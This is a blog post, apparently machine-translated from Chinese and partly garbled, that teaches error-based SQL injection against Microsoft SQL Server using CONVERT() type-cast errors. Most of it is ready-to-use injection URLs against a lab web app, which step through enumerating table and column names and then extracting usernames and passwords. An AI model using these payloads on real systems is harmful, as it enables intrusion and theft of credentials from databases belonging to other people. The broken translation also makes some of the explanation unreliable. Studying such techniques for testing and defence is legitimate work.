saulGoodman
A number of offensive and defensive research focused on the public's Red Team
Note the hands of Microsoft SQL Server error injection
Brief introduction
Today, the major share with sql
implantation of 报错型
, at most online article lists similar to the formula of the sentence, but can not explain why you want to use this function, why the use of this function will lead to error sql injection.
convert()
Function, CONVERT()
the function is to convert to the new date data type function through the Use.
grammar:
CONVERT(data_type(length),data_to_be_converted,style)
注释 :
data_type(length) 转换为⽬标数据类型(带有可选的长度)。
data_to_be_converted 含有需要转换的值。
style 规定⽇期/时间的输出格式。
⽰例:
CONVERT(VARCHAR(19),GETDATE())
CONVERT(VARCHAR(10),GETDATE(),110)
CONVERT(VARCHAR(11),GETDATE(),106)
CONVERT(VARCHAR(24),GETDATE(),113)
Similar results:
Dec 29 2008 11:45 PM
12-29-2008
29 Dec 08
29 Dec 2008 16:25:46.635
principle
For convert(int,@@version)
, convert
the function will therefore especially to Perform second shot parameter specifies the SQL query, and then try to convert the query result is int
type. However, due to the results of SQL queries are varchar
types, not be performed because the specified conversion, so the convert
function will throw ⼀ a SQL server
error message that says "SQL query results" ⽆ law converted to “int”
type, in this case, the attacker can get the results of a SQL query.
EMPTY condition of full function, there are many:
convert()
file_name()
db_name()
col_name()
filegroup_name()
object_name()
schema_name()
type_name()
cast()
Note START process
Basic information inquiry
convert(int,@@version) 获取版本信息
convert(int,db_name()) 数据库名字
convert(int,user) 当前⽤户名
convert(int,@@SERVERNAME) 获取有关服务器主机的信息
Obtain version information
http://192.168.159.135:8080/get.aspx?id=convert(int,@@version)
Note that we now function directly into id=
the back, because id=1
the query is an integer ( int
), and our convert(int,@@version)
acquired version information 字符型
, so he'll get an error so broke the version information!
Or you can use this statement can achieve the above results:
http://192.168.159.135:8080/get.aspx?id=1 and 1=(convert(int,@@version))
Get the current name of the database table
CONVERT(int,(select top 1 table_name from information_schema.columns))
http://192.168.159.135:8080/get.aspx?id=CONVERT(int,(select top 1 table_name from information_schema.columns)
We get to the site of the current database table names are: users
!
Gets the column name
convert(int,(select top 1 COLUMN_NAME from information_schema.columns where TABLE_NAME=cast(16进制的表名 as varchar)))
http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 COLUMN_NAME from information_schema.columns where TABLE_NAME=cast(0x7573657273 as varchar)))
So we get to the first column name id
!
So you want to get a second column names we can then add a conditional statement later:and COLUMN_NAME != 'id'
http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 COLUMN_NAME from information_schema.columns where TABLE_NAME=cast(0x7573657273 as varchar) and COLUMN_NAME != 'id'))
So we get to the second column names: username
!
I want to get the third and so on plus conditional statement:and COLUMN_NAME != 'username'
http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 COLUMN_NAME from information_schema.columns where TABLE_NAME=cast(0x7573657273 as varchar) and COLUMN_NAME != 'id' and COLUMN_NAME != 'username'))
So we get to the third column names password
!
retrieve data
We get the order to the table name above the site: users
, column names are: id
, username
, password
. Obviously account password in the column name username
, password
then we can get the data:
convert(int,(select top 1 列名 from 表名))
http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 username from users))
To get the first username
first data column name: saul
!
If you want to get to the username
inside of the second data then add a conditional statement:where username!='saul'
http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 username from users where username!='saul'))
This acquired username
second data! I want to get to the second and so on!
Now username
we get to the saul
two: admin
, ! So we're going to get their password!
http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 password from users))
Acquisition of the first password
value column: saul520
!
Want to get a plus on a where
conditional statement:where password!='saul520'
http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 password from users where password!='saul520'))
This will get to the second password
data up!
At this point Mssql
the 报错注入
stop here!